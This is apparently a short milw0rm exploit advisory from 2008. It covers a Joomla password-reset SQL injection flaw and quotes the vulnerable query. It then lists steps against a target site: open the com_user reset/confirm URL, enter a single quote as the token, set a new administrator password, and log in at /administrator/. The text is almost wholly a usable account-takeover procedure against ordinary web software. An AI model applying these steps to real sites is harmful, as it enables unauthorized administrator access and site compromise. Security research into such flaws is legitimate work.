looks like : "SELECT id FROM jos_users WHERE block = 0 AND activation = '' " Example : 1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm 2. Write into field "token" char ' and Click OK. 3. Write new password for admin 4. Go to url : target.com/administrator/ 5. Login admin with new password # milw0rm.com [2008-08-12]
